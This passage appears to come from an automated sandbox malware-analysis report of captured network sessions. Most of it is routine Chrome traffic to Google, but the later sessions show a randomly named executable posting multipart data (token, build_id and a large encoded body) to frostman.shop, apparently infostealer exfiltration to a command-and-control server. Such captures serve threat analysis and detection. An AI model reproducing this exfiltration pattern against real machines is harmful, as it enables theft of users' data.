                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1390INData Raw: 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30
                                                                                                                                                                                                                                                                              Data Ascii: lass\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u00
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1390INData Raw: 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c
                                                                                                                                                                                                                                                                              Data Ascii: 03cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC483INData Raw: 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 38
                                                                                                                                                                                                                                                                              Data Ascii: s\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13 8
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC454INData Raw: 31 62 66 0d 0a 30 20 35 36 2d 31 32 74 38 30 2d 34 37 71 36 39 2d 34 35 20 31 30 33 2e 35 2d 36 32 2e 35 54 36 33 33 2d 34 34 33 71 34 2d 31 20 35 2e 35 2d 34 2e 35 74 2d 2e 35 2d 37 2e 35 6c 2d 37 38 2d 31 31 37 71 2d 31 35 2d 32 31 2d 32 32 2e 35 2d 34 36 74 2d 37 2e 35 2d 35 32 76 2d 31 31 30 48 34 33 30 5a 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 70 61 74 68 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 20 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 49 20 67 62 5f 62 64 20 67 62 5f 5a 5c 22 20 64 61 74 61 2d 6f 67 73 72 2d 66 62 5c
                                                                                                                                                                                                                                                                              Data Ascii: 1bf0 56-12t80-47q69-45 103.5-62.5T633-443q4-1 5.5-4.5t-.5-7.5l-78-117q-15-21-22.5-46t-7.5-52v-110H430Z\"\u003e\u003c\/path\u003e \u003c\/svg\u003e \u003c\/a\u003e \u003c\/div\u003e \u003c\/div\u003e \u003cdiv class\u003d\"gb_I gb_bd gb_Z\" data-ogsr-fb\
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1390INData Raw: 38 30 30 30 0d 0a 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 5c 75 30 30 33 64 72 68 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 36 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20
                                                                                                                                                                                                                                                                              Data Ascii: 8000/about/products?tab\u003drh\" aria-expanded\u003d\"false\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M6,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1390INData Raw: 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4e 64 20 67 62 5f 36 64 5c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                              Data Ascii: abel\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Nd gb_6d\" aria-hidden\u003d\"true\" role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1390INData Raw: 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 30 32 36 5c 75 30 30 32 36 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 2e 77 72 61 70 28 61 29 3a 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 42 64 3b 42 64 5c 75 30 30 33 64 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 5f 2e 6b 64 7b 7d 3b 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 20 69 6e 20 61 2e 69 29 72 65 74 75 72 6e 20 61 2e 69 5b 62 5d 3b 74 68 72 6f 77 20 6e 65 77 20 42 64 3b 7d 3b 5f 2e 44 64 5c 75 30 30 33 64 66 75 6e 63 74
                                                                                                                                                                                                                                                                              Data Ascii: 03d\u003d\u003d\"function\"?a\u003d\u003ea\u0026\u0026AsyncContext.Snapshot.wrap(a):a\u003d\u003ea;\n}catch(e){_._DumpException(e)}\ntry{\nvar Bd;Bd\u003dclass extends _.kd{};_.Cd\u003dfunction(a,b){if(b in a.i)return a.i[b];throw new Bd;};_.Dd\u003dfunct
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1390INData Raw: 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 50 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 50 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 53 64 5c 75 30
                                                                                                                                                                                                                                                                              Data Ascii: d\u003d\"number\")return Number.isFinite(a)?a|0:void 0};Qd\u003dfunction(){let a\u003dnull;if(!Pd)return a;try{const b\u003dc\u003d\u003ec;a\u003dPd.createPolicy(\"ogb-qtm#html\",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){}return a};_.Sd\u0
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC1390INData Raw: 33 64 30 7d 3b 50 64 5c 75 30 30 33 64 5f 2e 48 64 3b 5f 2e 54 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 57 64 5c 75 30 30 33 64 2f 5e 5c 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 6a 65 2c 6e 65 2c 66 65 3b 5f 2e 68 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 66 65 28 5f 2e 67 65 28 61 29 29 3a 64 65 7c 7c 28 64 65 5c 75 30 30 33 64 6e 65 77 20 66 65 29 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75
                                                                                                                                                                                                                                                                              Data Ascii: 3d0};Pd\u003d_.Hd;_.Td\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Wd\u003d/^\\s*(?!javascript:)(?:[\\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;var je,ne,fe;_.he\u003dfunction(a){return a?new fe(_.ge(a)):de||(de\u003dnew fe)};_.ie\u003dfu


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              11192.168.2.749738172.217.21.364437680C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:24 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:24 GMT
                                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                              2024-12-20 06:31:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              12192.168.2.749765116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:29 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 505
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:29 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------2DTJEUS2DTRQQIMOZMYMCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:30 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              13192.168.2.749770116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----ZU3EUA1VAI5FUA1DJ589
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 213453
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 5a 55 33 45 55 41 31 56 41 49 35 46 55 41 31 44 4a 35 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------ZU3EUA1VAI5FUA1DJ589Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------ZU3EUA1VAI5FUA1DJ589Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------ZU3EUA1VAI5FUA1DJ589Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
